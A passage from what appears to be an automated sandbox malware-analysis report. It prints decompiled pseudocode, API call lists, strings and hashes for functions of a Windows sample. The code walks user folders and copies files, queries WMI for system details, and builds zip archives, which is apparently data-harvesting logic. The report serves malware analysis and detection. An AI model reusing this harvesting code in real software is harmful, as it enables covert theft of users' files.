							 *0x464860( &_v268, _t104);
							 *0x464860( &_v268, "\\");
							 *0x464860( &_v268,  &(_v1368.cFileName));
							E004295D0(_t103,  &_v268,  &_v1048);
							_t108 = _t108 + 0x3c;
							_t116 = _v1368.dwFileAttributes & 0x00000010;
							if((_v1368.dwFileAttributes & 0x00000010) != 0) {
								E00411B90(_t80, _t116,  &_v528, _v1380, _v1376, _t103);
								_t108 = _t108 + 0x10;
							}
						}
					}
					_t94 =  &_v1368;
				} while (FindNextFileA(_v1372,  &_v1368) != 0);
				_t49 = FindClose(_v1372);
				goto L7;
			}

0x00411b90
0x00411b99
0x00411ba0
0x00411baa
0x00411bae
0x00411bae
0x00411bb4
0x00411bba
0x00411bc0
0x00411bc9
0x00411bd5
0x00411bdb
0x00411bec
0x00411bf2
0x00411bfb
0x00411db7
0x00411dc6
0x00000000
0x00000000
0x00000000
0x00411c01
0x00411c01
0x00411c01
0x00411c0c
0x00411c15
0x00411c1b
0x00411c26
0x00411c2f
0x00411c49
0x00411c70
0x00411c84
0x00411c98
0x00411caa
0x00411cbc
0x00411cce
0x00411ce0
0x00411cf2
0x00411d04
0x00411d16
0x00411d24
0x00411d36
0x00411d4a
0x00411d5f
0x00411d64
0x00411d67
0x00411d6e
0x00411d86
0x00411d8b
0x00411d8b
0x00411d6e
0x00411c2f
0x00411d94
0x00411da2
0x00411db1
0x00000000

APIs

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

wsprintfA.USER32 ref: 00411BD5
FindFirstFileA.KERNEL32(?,?), ref: 00411BEC
StrCmpCA.SHLWAPI(?,004456B0), ref: 00411C0D
StrCmpCA.SHLWAPI(?,004456AC), ref: 00411C27
wsprintfA.USER32 ref: 00411C49
wsprintfA.USER32 ref: 00411C70
_memset.LIBCMT ref: 00411C84
lstrcat.KERNEL32(?,00443C68), ref: 00411C98
lstrcat.KERNEL32(?,00445C08), ref: 00411CAA
lstrcat.KERNEL32(?,00445A68), ref: 00411CBC
lstrcat.KERNEL32(?,00445A6C), ref: 00411CCE
lstrcat.KERNEL32(?,00445A6C), ref: 00411CE0
lstrcat.KERNEL32(?,00445A78), ref: 00411CF2
lstrcat.KERNEL32(?,00445A84), ref: 00411D04
lstrcat.KERNEL32(?,00445A44), ref: 00411D16
lstrcat.KERNEL32(?,?), ref: 00411D24
lstrcat.KERNEL32(?,00443C68), ref: 00411D36
lstrcat.KERNEL32(?,?), ref: 00411D4A
FindNextFileA.KERNEL32(?,?), ref: 00411D9C
FindClose.KERNEL32(?), ref: 00411DB1

Strings

`>A, xrefs: 00411BAE, 00411D5E, 00411D7C
%s\%s\*, xrefs: 00411BCF
%s\%s, xrefs: 00411C43, 00411C6A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$Findwsprintf$File_memset$CloseFirstFolderNextPath
String ID: %s\%s$%s\%s\*$`>A
API String ID: 526032476-3197103229
Opcode ID: 5daa91ed2141044b508b81ec07230d15aab9406f89b0225606f8806c5f597ffd
Instruction ID: 7af03a2f6685edc0cdd5902f92b89bfe2401045d06e13a160f7a945ce3be248a
Opcode Fuzzy Hash: 5daa91ed2141044b508b81ec07230d15aab9406f89b0225606f8806c5f597ffd
Instruction Fuzzy Hash: 4751C67690061CABDF50EFA0EC89EEB7778AB99701F000599F545A3041EBB49AC4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFF0 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 310
fileCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0041AFF0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				char _v1048;
				struct _WIN32_FIND_DATAA _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				void* _v1389;
				intOrPtr _v1396;
				void* _v1400;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t99;
				intOrPtr _t102;
				int _t105;
				int _t109;
				intOrPtr _t115;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				intOrPtr _t156;
				intOrPtr _t203;
				intOrPtr _t205;
				intOrPtr _t207;
				intOrPtr _t227;
				void* _t228;
				signed int _t229;
				void* _t230;
				void* _t231;
				void* _t233;

				_t99 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t99 ^ _t229;
				_t156 = _a16;
				_t227 = _a12;
				_v1384 = _a4;
				_t102 = _a8;
				_t228 = __ecx;
				_v1376 = _a24;
				_v1372 = _a20;
				_t200 =  &_v1048;
				_v1388 = _t102;
				_v1380 = _a28;
				wsprintfA( &_v1048, "%s\\*", _t102);
				_t231 = _t230 + 0xc;
				_t105 = FindFirstFileA( &_v1048,  &_v1368); // executed
				_v1400 = _t105;
				_v1396 = 0;
				if(_t105 == 0xffffffff) {
					L25:
					return E0042A36A(_t105, _t156, _v8 ^ _t229, _t200, _t227, _t228);
				} else {
					do {
						_push(".");
						_push( &(_v1368.cFileName));
						if( *0x464890() == 0) {
							goto L23;
						}
						_push("..");
						_push( &(_v1368.cFileName));
						if( *0x464890() == 0) {
							goto L23;
						}
						wsprintfA( &_v268, "%s\\%s", _v1388,  &(_v1368.cFileName));
						E0042A2F0( &_v528, 0, 0x104);
						_t203 =  *0x453364; // 0x25c65a0
						_t115 =  *0x4539f0; // 0x25c87d0
						wsprintfA( &_v528, "%s\\%s\\%s\\%s", _v1388,  &(_v1368.cFileName), _t115, _t203);
						E0042A2F0( &_v788, 0, 0x104);
						_t205 =  *0x453364; // 0x25c65a0
						_t119 =  *0x4539f0; // 0x25c87d0
						wsprintfA( &_v788, "%s\\%s\\%s", _v1388, _t119, _t205);
						_t121 =  *0x453604; // 0x25c6260
						_t233 = _t231 + 0x54;
						_push(_t121);
						_push( &(_v1368.cFileName));
						if( *0x464890() != 0) {
							_t123 =  *0x453364; // 0x25c65a0
							_push(_t123);
							_push( &(_v1368.cFileName));
							if( *0x464890() != 0) {
								_t126 = E004205C0( &_v528); // executed
								if(_t126 == 0) {
									_t207 =  *0x4536a8; // 0x25c8710
									_t128 =  *0x464890( &(_v1368.cFileName), _t207);
									if(_t128 != 0) {
										_t129 =  *0x4533fc; // 0x25c61a0
										_t130 =  *0x464890( &(_v1368.cFileName), _t129);
										if(_t130 != 0) {
											if((_v1368.dwFileAttributes & 0x00000010) == 0) {
												goto L22;
											}
											L20:
											_push(_a32);
											_push(_v1380);
											_push(_v1376);
											_push(_v1372);
											_push(_t156);
											_push(_t227);
											_push( &_v268);
											_push( &(_v1368.cFileName));
											goto L21;
										}
										if( *((intOrPtr*)(_t228 + 1)) != _t130) {
											E0041AC80( &_v268, _v1384, _t227, _t156, _v1372, _v1376); // executed
											E00415200( &_v268, _v1384, _t227, _t156, _v1372, _v1376); // executed
										}
										goto L20;
									}
									if( *((intOrPtr*)(_t228 + 2)) != _t128) {
										E00415420(_t156, _t227, _t228,  &_v268, _v1384, _t227, _t156, _v1372, _v1376);
										E00415610( &_v268, _v1384, _t227, _t156, _v1372, _v1376);
									}
									goto L8;
								}
								E0041A760( &_v528,  &(_v1368.cFileName), _t227, _t156, _v1372, _v1376); // executed
								_push(_a32);
								_push(_v1380);
								_push(_v1376);
								_push(_v1372);
								_push(_t156);
								_push(_t227);
								_push( &_v268);
								_push( &(_v1368.cFileName));
								goto L21;
							}
							E0041A760( &_v268, _v1384, _t227, _t156, _v1372, _v1376);
							goto L8;
						} else {
							E0041A450(_v1384,  &_v268, _t227, _t156, _v1372, _v1380); // executed
							if(_a32 != 0 && _v1396 == 0) {
								E0041A760( &_v788, 0x443c1c, _t227, _t156, _v1372, _v1376);
								_v1396 = 1;
							}
							L8:
							_push(_a32);
							_push(_v1380);
							_push(_v1376);
							_push(_v1372);
							_push(_t156);
							_push(_t227);
							_push( &_v268);
							_push( &(_v1368.cFileName));
							L21:
							E0041AFF0(_t228); // executed
							L22:
							E0042A2F0( &_v528, 0, 0x104);
							E0042A2F0( &_v788, 0, 0x104);
							_t231 = _t233 + 0x18;
						}
						L23:
						_t109 = FindNextFileA(_v1400,  &_v1368); // executed
					} while (_t109 != 0);
					_t200 = _v1400;
					_t105 = FindClose(_v1400);
					goto L25;
				}
			}

0x0041aff9
0x0041b000
0x0041b00a
0x0041b00f
0x0041b012
0x0041b018
0x0041b01b
0x0041b021
0x0041b027
0x0041b030
0x0041b03c
0x0041b042
0x0041b048
0x0041b04e
0x0041b05f
0x0041b065
0x0041b06b
0x0041b078
0x0041b401
0x0041b411
0x0041b080
0x0041b080
0x0041b080
0x0041b08b
0x0041b094
0x00000000
0x00000000
0x0041b09a
0x0041b0a5
0x0041b0ae
0x00000000
0x00000000
0x0041b0ce
0x0041b0e2
0x0041b0e7
0x0041b0ed
0x0041b10e
0x0041b122
0x0041b127
0x0041b12d
0x0041b14a
0x0041b150
0x0041b155
0x0041b158
0x0041b15f
0x0041b168
0x0041b1fd
0x0041b202
0x0041b209
0x0041b212
0x0041b248
0x0041b255
0x0041b2a4
0x0041b2ac
0x0041b2b4
0x0041b30e
0x0041b31b
0x0041b323
0x0041b37d
0x00000000
0x00000000
0x0041b37f
0x0041b38e
0x0041b395
0x0041b396
0x0041b397
0x0041b398
0x0041b399
0x0041b3a0
0x0041b3a7
0x00000000
0x0041b3a7
0x0041b328
0x0041b34a
0x0041b36f
0x0041b36f
0x00000000
0x0041b328
0x0041b2b9
0x0041b2df
0x0041b304
0x0041b304
0x00000000
0x0041b2b9
0x0041b271
0x0041b285
0x0041b28c
0x0041b28d
0x0041b28e
0x0041b28f
0x0041b290
0x0041b297
0x0041b29e
0x00000000
0x0041b29e
0x0041b234
0x00000000
0x0041b16e
0x0041b18e
0x0041b197
0x0041b1c0
0x0041b1c5
0x0041b1c5
0x0041b1cf
0x0041b1de
0x0041b1e5
0x0041b1e6
0x0041b1e7
0x0041b1e8
0x0041b1e9
0x0041b1f0
0x0041b1f7
0x0041b3a8
0x0041b3aa
0x0041b3af
0x0041b3bd
0x0041b3d0
0x0041b3d5
0x0041b3d5
0x0041b3d8
0x0041b3e6
0x0041b3ec
0x0041b3f4
0x0041b3fb
0x00000000
0x0041b3fb

APIs

wsprintfA.USER32 ref: 0041B048
FindFirstFileA.KERNEL32(?,?), ref: 0041B05F
StrCmpCA.SHLWAPI(?,004456B0), ref: 0041B08C
StrCmpCA.SHLWAPI(?,004456AC), ref: 0041B0A6
wsprintfA.USER32 ref: 0041B0CE
_memset.LIBCMT ref: 0041B0E2
wsprintfA.USER32 ref: 0041B10E
_memset.LIBCMT ref: 0041B122
wsprintfA.USER32 ref: 0041B14A
StrCmpCA.SHLWAPI(?,025C6260), ref: 0041B160
StrCmpCA.SHLWAPI(?,025C65A0), ref: 0041B20A
StrCmpCA.SHLWAPI(?,025C8710,?), ref: 0041B2AC
StrCmpCA.SHLWAPI(?,025C61A0), ref: 0041B31B

Part of subcall function 0041A760: StrCmpCA.SHLWAPI(00000000,025C6600,C21D6F0A,?,00000000,00000000), ref: 0041A7B9
Part of subcall function 0041A760: _memset.LIBCMT ref: 0041A807
Part of subcall function 0041A760: lstrcat.KERNEL32(?,025C13D0), ref: 0041A81D
Part of subcall function 0041A760: lstrcat.KERNEL32(?,00000000), ref: 0041A838
Part of subcall function 0041A760: CopyFileA.KERNEL32(?,?,00000001), ref: 0041A848
Part of subcall function 0041A760: _memset.LIBCMT ref: 0041A85C
Part of subcall function 0041A760: lstrcat.KERNEL32(?,00443C68), ref: 0041A870
Part of subcall function 0041A760: lstrcat.KERNEL32(?,025C6450), ref: 0041A884
Part of subcall function 0041A760: lstrcat.KERNEL32(?,00443C68), ref: 0041A896
Part of subcall function 0041A760: lstrcat.KERNEL32(?,00000000), ref: 0041A8A4
Part of subcall function 0041A760: lstrcat.KERNEL32(?,00445E84), ref: 0041A8B6
Part of subcall function 0041A760: lstrcat.KERNEL32(?,?), ref: 0041A8C4
Part of subcall function 0041A760: lstrcat.KERNEL32(?,.txt), ref: 0041A8D6

_memset.LIBCMT ref: 0041B3BD
_memset.LIBCMT ref: 0041B3D0

Part of subcall function 0041A450: _memset.LIBCMT ref: 0041A4AD
Part of subcall function 0041A450: lstrcat.KERNEL32(?,025C13D0), ref: 0041A4C3
Part of subcall function 0041A450: lstrcat.KERNEL32(?,00000000), ref: 0041A4DE
Part of subcall function 0041A450: CopyFileA.KERNEL32(00000000,?,00000001), ref: 0041A4EE

FindNextFileA.KERNELBASE(?,?), ref: 0041B3E6
FindClose.KERNEL32(?), ref: 0041B3FB

Strings

%s\%s, xrefs: 0041B0C8
%s\%s\%s\%s, xrefs: 0041B108
%s\*, xrefs: 0041B036
%s\%s\%s, xrefs: 0041B144

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$Filewsprintf$Find$Copy$CloseFirstNext
String ID: %s\%s$%s\%s\%s$%s\%s\%s\%s$%s\*
API String ID: 2783324787-2940171090
Opcode ID: 5da0089dd65ef27192ff1a6332a48e043458ed0bce09050849ce3f2e617dda92
Instruction ID: a63244108fbcaf2267bb7b7c8ef141007fdb2cf6b59bde611ec21c085de1b825
Opcode Fuzzy Hash: 5da0089dd65ef27192ff1a6332a48e043458ed0bce09050849ce3f2e617dda92
Instruction Fuzzy Hash: FAC110B5A00A18AFDB24DB54DC94EEB73B9EB89702F0041D9F509A3241DB74AEC5CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041F170 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 177
memorycomtimeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041F170() {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				struct _SYSTEMTIME _v40;
				intOrPtr _v48;
				long _v52;
				signed int _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				char _v88;
				intOrPtr _v96;
				char _v104;
				struct _FILETIME _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t50;
				intOrPtr* _t53;
				void* _t55;
				CHAR* _t56;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t64;
				CHAR* _t71;
				void* _t76;
				void* _t78;
				intOrPtr _t95;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				CHAR* _t105;
				signed int _t106;
				void* _t107;

				_t49 =  *0x451f00; // 0xc21d6f0a
				_t50 = _t49 ^ _t106;
				_v24 = _t50;
				 *[fs:0x0] =  &_v16;
				_v20 = _t107 - 0x60;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t50, _t101, _t103, _t76,  *[fs:0x0], E0043F460, 0xffffffff);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0); // executed
				_v84 = 0;
				__imp__CoCreateInstance(0x4477bc, 0, 1, 0x4476ec,  &_v84); // executed
				_t53 = _v84;
				_t94 =  &_v72;
				_v72 = 0;
				_t55 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0xc))))(_t53, L"ROOT\\CIMV2", 0, 0, 0, 0, 0, 0,  &_v72); // executed
				if(_t55 < 0) {
					L7:
					_t56 = "Unknown";
					L8:
					 *[fs:0x0] = _v16;
					_pop(_t102);
					_pop(_t104);
					_pop(_t78);
					return E0042A36A(_t56, _t78, _v24 ^ _t106, _t94, _t102, _t104);
				}
				__imp__CoSetProxyBlanket(_v72, 0xa, 0, 0, 3, 3, 0, 0); // executed
				_t58 = _v72;
				_v80 = 0;
				_t95 =  *_t58;
				_t94 =  *(_t95 + 0x50);
				_t59 =  *( *(_t95 + 0x50))(_t58, L"WQL", L"Select * From Win32_OperatingSystem", 0x20, 0,  &_v80); // executed
				if(_t59 < 0) {
					goto L7;
				}
				_v76 = 0;
				_v88 = 0;
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				_t60 = _v80;
				_v8 = 1;
				if(_t60 == 0) {
					goto L7;
				}
				_t94 =  &_v76;
				 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 0x10))))(_t60, 0xffffffff, 1,  &_v76,  &_v88); // executed
				if(_v88 == 0) {
					if(_v48 >= 0x10) {
						_t94 = _v68;
						_push(_v68);
						E0042A289();
					}
					goto L7;
				}
				__imp__#8( &_v104);
				_t64 = _v76;
				_v8 = 2;
				 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 0x10))))(_t64, L"InstallDate", 0,  &_v104, 0, 0); // executed
				E0041EF90(_v96,  &_v112, 1); // executed
				FileTimeToSystemTime( &_v112,  &_v40);
				_t71 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_t94 = _v40.wMonth & 0x0000ffff;
				_t105 = _t71;
				wsprintfA(_t105, "%d/%d/%d %d:%d:%d", _v40.wDay & 0x0000ffff, _v40.wMonth & 0x0000ffff, _v40.wYear & 0x0000ffff, _v40.wHour & 0x0000ffff, _v40.wMinute & 0x0000ffff, _v40.wSecond & 0x0000ffff);
				__imp__#9( &_v104);
				E0040A450( &_v68);
				_t56 = _t105;
				goto L8;
			}

0x0041f184
0x0041f189
0x0041f18b
0x0041f195
0x0041f19b
0x0041f1a2
0x0041f1a5
0x0041f1b6
0x0041f1cd
0x0041f1d0
0x0041f1d6
0x0041f1d9
0x0041f1e3
0x0041f1f1
0x0041f1f5
0x0041f324
0x0041f324
0x0041f329
0x0041f32c
0x0041f334
0x0041f335
0x0041f336
0x0041f344
0x0041f344
0x0041f209
0x0041f20f
0x0041f21e
0x0041f221
0x0041f223
0x0041f22c
0x0041f230
0x00000000
0x00000000
0x0041f236
0x0041f239
0x0041f23c
0x0041f243
0x0041f246
0x0041f249
0x0041f24c
0x0041f252
0x00000000
0x00000000
0x0041f25e
0x0041f26a
0x0041f26f
0x0041f316
0x0041f318
0x0041f31b
0x0041f31c
0x0041f321
0x00000000
0x0041f316
0x0041f279
0x0041f27f
0x0041f294
0x0041f298
0x0041f2a4
0x0041f2b4
0x0041f2c7
0x0041f2db
0x0041f2df
0x0041f2f3
0x0041f300
0x0041f309
0x0041f30e
0x00000000

APIs

CoInitializeEx.OLE32(00000000,00000000,C21D6F0A,?,00000010,?), ref: 0041F1A5
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000010,?), ref: 0041F1B6
CoCreateInstance.OLE32(004477BC,00000000,00000001,004476EC,?,?,00000010,?), ref: 0041F1D0
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000010,?), ref: 0041F209
VariantInit.OLEAUT32(?), ref: 0041F279

Part of subcall function 0041EF90: CoCreateInstance.OLE32(0044756C,00000000,00000001,004467A0,?,00000000,00000010,?), ref: 0041EFAD
Part of subcall function 0041EF90: SysAllocString.OLEAUT32(?), ref: 0041EFBC
Part of subcall function 0041EF90: SysFreeString.OLEAUT32(?), ref: 0041F018
Part of subcall function 0041EF90: SysFreeString.OLEAUT32(00000000), ref: 0041F01B

FileTimeToSystemTime.KERNEL32(?,?,?,00000010,?), ref: 0041F2B4
GetProcessHeap.KERNEL32(?,00000010,?), ref: 0041F2BA
HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00000010,?), ref: 0041F2C7
wsprintfA.USER32 ref: 0041F2F3
VariantClear.OLEAUT32(?), ref: 0041F300

Strings

Select * From Win32_OperatingSystem, xrefs: 0041F219
ROOT\CIMV2, xrefs: 0041F1E8
WQL, xrefs: 0041F226
%d/%d/%d %d:%d:%d, xrefs: 0041F2ED
InstallDate, xrefs: 0041F28E
Unknown, xrefs: 0041F324

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystemwsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
API String ID: 3748038148-271508173
Opcode ID: bb611be1e88dd77301ab17801de3bb0791c71e1dc9de10d110856a3910e5be54
Instruction ID: c05cad58191e22f1191b1cb6e70d21f02c6f4f131a2711aaf76fc59411df7853
Opcode Fuzzy Hash: bb611be1e88dd77301ab17801de3bb0791c71e1dc9de10d110856a3910e5be54
Instruction Fuzzy Hash: EB5159B1A00208AFEB10DFD4DC85EAEB7BCFB49708F10452AF615A7280D779AD45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00428C70 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 670
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00428C70(void* __ebx, signed int* __ecx, void* __edx, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v28;
				char _v29;
				char _v40;
				char _v52;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v328;
				char _v588;
				char _v848;
				signed int _v852;
				char* _v856;
				char* _v860;
				char _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				signed int _v1132;
				short _v1134;
				short _v1136;
				signed int _v1140;
				signed int _v1144;
				intOrPtr _v1148;
				char _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				unsigned int _v1168;
				signed int _v1170;
				signed int _v1172;
				char _v1176;
				signed int _v1180;
				signed int _v1181;
				signed int _v1188;
				signed int _v1192;
				void* _v1196;
				signed int _v1200;
				signed int* _v1204;
				void* __edi;
				signed int _t294;
				intOrPtr _t296;
				signed int _t298;
				signed int _t299;
				char _t305;
				signed int _t307;
				signed int _t310;
				signed int _t313;
				signed int _t316;
				signed int _t321;
				signed int _t325;
				signed int _t327;
				signed int _t334;
				signed char _t337;
				unsigned int _t341;
				unsigned int _t344;
				signed int _t348;
				intOrPtr _t352;
				signed int _t356;
				signed int _t360;
				signed int _t362;
				signed int _t368;
				signed int _t371;
				signed int _t372;
				void* _t373;
				signed int _t377;
				signed int _t379;
				signed int _t382;
				signed int _t388;
				signed int _t394;
				void* _t396;
				signed int _t404;
				void* _t405;
				signed int _t421;
				signed char _t430;
				signed char _t436;
				signed char _t445;
				signed int _t455;
				signed int _t456;
				void* _t457;
				void* _t458;
				void* _t459;
				void* _t460;
				void* _t461;
				void* _t462;
				signed int _t472;
				signed int _t474;
				signed int _t476;
				signed char _t482;
				unsigned int _t484;
				unsigned int _t489;
				signed int _t498;
				signed int _t501;
				char* _t530;
				signed int _t561;
				signed int _t575;
				signed int _t580;
				void* _t581;
				unsigned int _t588;
				signed int _t593;
				signed int _t595;
				intOrPtr _t599;
				signed int _t600;
				intOrPtr _t604;
				void* _t605;
				signed char* _t607;
				signed int* _t608;
				void* _t609;
				void* _t610;
				void* _t611;
				void* _t612;
				void* _t613;
				void* _t614;
				void* _t615;
				signed int _t616;
				void* _t617;
				void* _t618;

				_t403 = __ebx;
				_t294 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t294 ^ _t616;
				_t296 = _a4;
				_t579 = __ecx;
				_v1204 = __ecx;
				_v1188 = _a8;
				if(__ecx[5] == 0) {
					__eflags = __ecx[0xb];
					if(__ecx[0xb] == 0) {
						__eflags =  *__ecx;
						_push(__esi);
						_t604 = _a16;
						_v1196 = 0;
						if( *__ecx != 0) {
							__eflags = _t604 - 4;
							if(_t604 != 4) {
								_v1196 = 0xc;
							}
						}
						_t538 =  &_v312;
						 *0x46490c( &_v312, _t296);
						__eflags = _v312;
						if(_v312 != 0) {
							_t298 =  &_v312;
							do {
								__eflags =  *_t298 - 0x5c;
								if( *_t298 == 0x5c) {
									 *_t298 = 0x2f;
								}
								_t298 = _t298 + 1;
								__eflags =  *_t298;
							} while ( *_t298 != 0);
							__eflags = _t604 - 4;
							_t299 = _t298 & 0xffffff00 | _t604 == 0x00000004;
							_v1181 = _t299;
							__eflags = _t299;
							if(_t299 == 0) {
								L15:
								_v1180 = 0;
							} else {
								_t396 = E0042BC70( &_v312);
								_t530 =  &_v312;
								_t617 = _t617 + 4;
								__eflags =  *((char*)(_t396 + _t530 - 1)) - 0x2f;
								_v1180 = 1;
								if( *((char*)(_t396 + _t530 - 1)) == 0x2f) {
									goto L15;
								}
							}
							__eflags = _v1181;
							_push(_t403);
							_t404 = 8;
							_v1200 = 8;
							if(_v1181 != 0) {
								L18:
								_t404 = 0;
								__eflags = 0;
								_v1200 = 0;
							} else {
								_t538 =  &_v312;
								_t394 = E00426970( &_v312);
								_t617 = _t617 + 4;
								__eflags = _t394;
								if(_t394 != 0) {
									goto L18;
								}
							}
							__eflags = _t604 - 2;
							if(_t604 != 2) {
								__eflags = _t604 - 1;
								if(_t604 != 1) {
									__eflags = _t604 - 3;
									if(_t604 != 3) {
										__eflags = _t604 - 4;
										if(_t604 != 4) {
											_t300 = 0x10000;
											goto L92;
										} else {
											_t300 = E00427320(_t579, _t579);
											goto L27;
										}
									} else {
										_t300 = E004271E0(_t579, _t579, _v1188, _a12);
										goto L27;
									}
								} else {
									_t538 = _v1188;
									_t300 = E00427080(_t579, _v1188, _a12);
									goto L27;
								}
							} else {
								_t300 = E00427E50(_t579, _v1188); // executed
								L27:
								__eflags = _t300;
								if(_t300 != 0) {
									L92:
									_pop(_t405);
									_pop(_t605);
									__eflags = _v8 ^ _t616;
									return E0042A36A(_t300, _t405, _v8 ^ _t616, _t538, _t579, _t605);
								} else {
									_v316 = 0;
									 *0x46490c( &_v1120, 0x443c1c);
									 *0x46490c( &_v848,  &_v312);
									_t305 =  *0x464758( &_v848);
									__eflags = _v1180;
									_v1152 = _t305;
									if(_v1180 != 0) {
										 *0x464860( &_v848, "/");
										_t43 =  &_v1152;
										 *_t43 = _v1152 + 1;
										__eflags =  *_t43;
									}
									 *0x46490c( &_v588, 0x443c1c);
									_v1134 = 0;
									_t307 = 8;
									_v852 = 0;
									_v1140 = 0;
									_v328 = 1;
									_v320 = 0;
									_v1176 = 0x140b17;
									_v1168 =  *((intOrPtr*)(_t579 + 0x68));
									_v1164 = 0;
									_v1172 = 8;
									__eflags =  *_t579;
									if( *_t579 != 0) {
										__eflags = _v1181;
										if(_v1181 == 0) {
											_t307 = 9;
											_v1172 = 9;
										}
									}
									_v1132 = _t307;
									_v1170 = _t404;
									__eflags = _t404;
									if(_t404 != 0) {
										L36:
										_v1160 = 0;
									} else {
										_t388 =  *(_t579 + 0x70);
										__eflags = _t388;
										if(_t388 < 0) {
											goto L36;
										} else {
											_v1160 = _v1196 + _t388;
										}
									}
									_v1156 =  *(_t579 + 0x70);
									_v1124 =  *((intOrPtr*)(_t579 + 0x18)) +  *((intOrPtr*)(_t579 + 0x10));
									_v1136 = 0;
									_v1128 =  *((intOrPtr*)(_t579 + 0x4c));
									_v23 =  *(_t579 + 0x58);
									_v860 =  &_v28;
									_t310 =  *(_t579 + 0x5c);
									_v856 =  &_v52;
									_t472 =  *(_t579 + 0x58);
									_v22 = (_t310 << 0x00000020 | _t472) >> 8;
									_v21 = (_t310 << 0x00000020 | _t472) >> 0x10;
									_v19 =  *(_t579 + 0x50) & 0x000000ff;
									_t313 =  *(_t579 + 0x54);
									_v20 = (_t310 << 0x00000020 | _t472) >> 0x18;
									_t474 =  *(_t579 + 0x50);
									_v18 = (_t313 << 0x00000020 | _t474) >> 8;
									_v16 = (_t313 << 0x00000020 | _t474) >> 0x18;
									_t476 =  *(_t579 + 0x60);
									_v15 =  *(_t579 + 0x60) & 0x000000ff;
									_t316 =  *(_t579 + 0x64);
									_v17 = (_t313 << 0x00000020 | _t474) >> 0x10;
									_v14 = (_t316 << 0x00000020 | _t476) >> 8;
									_v12 = (_t316 << 0x00000020 | _t476) >> 0x18;
									_v1148 = 0x11;
									_v1144 = 9;
									_v28 = 0xd5455;
									_v24 = 7;
									_v13 = (_t316 << 0x00000020 | _t476) >> 0x10;
									E0042B8D0( &_v52,  &_v28, 9);
									 *((char*)(_v856 + 2)) = 5;
									_t321 = E00425FC0( &_v52,  &_v1176, E00427E30, _t579);
									_t618 = _t617 + 0x18;
									__eflags = _t321;
									if(_t321 == 0) {
										_t146 = _v1152 + 0x1e; // 0x2f
										 *((intOrPtr*)(_t579 + 0x18)) =  *((intOrPtr*)(_t579 + 0x18)) + _v1148 + _t146;
										__eflags =  *(_t579 + 0x14);
										if( *(_t579 + 0x14) == 0) {
											_t607 = _t579 + 0x30;
											 *((intOrPtr*)(_t579 + 0x34)) = 0x23456789;
											 *((intOrPtr*)(_t579 + 0x38)) = 0x34567890;
